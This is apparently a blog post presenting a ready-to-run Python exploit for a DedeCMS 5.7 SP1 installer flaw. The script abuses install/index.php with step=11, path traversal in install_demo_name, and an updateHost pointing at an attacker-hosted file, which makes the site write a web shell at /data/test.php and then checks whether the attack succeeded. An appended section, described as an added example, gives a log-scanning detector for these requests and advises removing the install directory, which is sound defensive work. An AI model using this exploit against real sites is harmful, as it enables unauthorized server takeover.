Learning Python: writing a DedeCMS exploit
Writing an exploit for the DedeCMS (织梦) 5.7 SP1 remote file inclusion getshell vulnerability. For the vulnerability analysis, see the existing writeups online; I won't repeat it here.
Exploit
# -*- coding:utf-8 -*-
import requests
import time

def dada(url):
    url_index = url + "/install/index.php"
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 "
                             "(KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"}
    try:
        # headers must be passed as a keyword argument; positionally it would be taken as params
        url_request = requests.get(url_index, headers=headers)
        time.sleep(3)
        if url_request.status_code == 200:
            print("Vulnerable file exists, starting the test")
            time.sleep(5)
            url_url = url + "/install/index.php?step=11&insLockfile=a&s_lang=x&install_demo_name=../data/admin/config_update.php"  # reset its parameters
            print(url_url)
            requests.get(url=url_url, headers=headers)  # send the reset request
            # time.sleep(2)
            url_url2 = url + "/install/index.php?step=11&insLockfile=a&s_lang=x&install_demo_name=../data/test.php&updateHost=http://127.0.0.1/"  # replace with the address that hosts demodata.x.txt
            print(url_url2)
            requests.get(url=url_url2, headers=headers)  # send the exp
            url_exp = url + "/data/test.php"
            url_final = requests.get(url=url_exp, headers=headers)
            if url_final.status_code == 200:
                print("Attack succeeded, please visit \n " + url_exp)
            else:
                print("Test failed, please test manually")
        else:
            print("Check complete, the vulnerability does not exist")
    except Exception:
        print("error: please check the network or the url")
        # print(url)

if __name__ == '__main__':
    dada("http://127.0.0.1/dede/dedecms")
Don't ask me why I added the delays; it's just for style.
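From the defender's side, the same request shapes the script above sends are easy to pick out of a web server access log: any hit on install/index.php after deployment is already suspicious, and step=11 combined with a traversal sequence in install_demo_name or an overridden updateHost is the signature of this attack chain. The following detector is an added example, not part of the original post or of DedeCMS; the log lines are constructed samples, and the field names it checks are the ones that appear in the exploit URLs above.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines in the common "combined" format; they are not
# from any real server and only reproduce the request shapes the script above emits.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:12:00:01 +0000] "GET /dede/install/index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:12:00:04 +0000] "GET /dede/install/index.php?step=11&insLockfile=a&s_lang=x&install_demo_name=../data/admin/config_update.php HTTP/1.1" 200 128 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:12:00:09 +0000] "GET /dede/install/index.php?step=11&insLockfile=a&s_lang=x&install_demo_name=../data/test.php&updateHost=http://127.0.0.1/ HTTP/1.1" 200 128 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2023:12:01:00 +0000] "GET /dede/index.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def classify_request(target):
    """Return the reasons a request target looks like abuse of the installer, [] if clean."""
    parts = urlsplit(target)
    path = unquote(parts.path).lower()
    if not path.endswith("/install/index.php"):
        return []
    # decode values so percent-encoded traversal (%2e%2e/) is caught as well
    query = {k: [unquote(v) for v in vs]
             for k, vs in parse_qs(parts.query, keep_blank_values=True).items()}
    reasons = ["installer script still reachable"]
    if query.get("step") == ["11"]:
        reasons.append("step=11 demo-data import requested")
    if any(".." in v for v in query.get("install_demo_name", [])):
        reasons.append("directory traversal in install_demo_name")
    if "updateHost" in query:
        reasons.append("updateHost overridden to an attacker-chosen source")
    return reasons


def scan_log(text):
    """Parse log lines and return one alert per suspicious request, tagged with the client IP."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = classify_request(m.group("target"))
        if reasons:
            alerts.append({"ip": m.group("ip"), "status": int(m.group("status")),
                           "target": m.group("target"), "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for a in scan_log(SAMPLE_LOG):
        print(a["ip"], a["status"], a["target"])
        for r in a["reasons"]:
            print("   -", r)
```

A 200 on the plain installer probe is the finding that matters most: the durable fix is to remove or block the install directory once setup is done, so that none of the later requests can reach step=11 at all; the detector then only needs to catch hosts where that cleanup was missed.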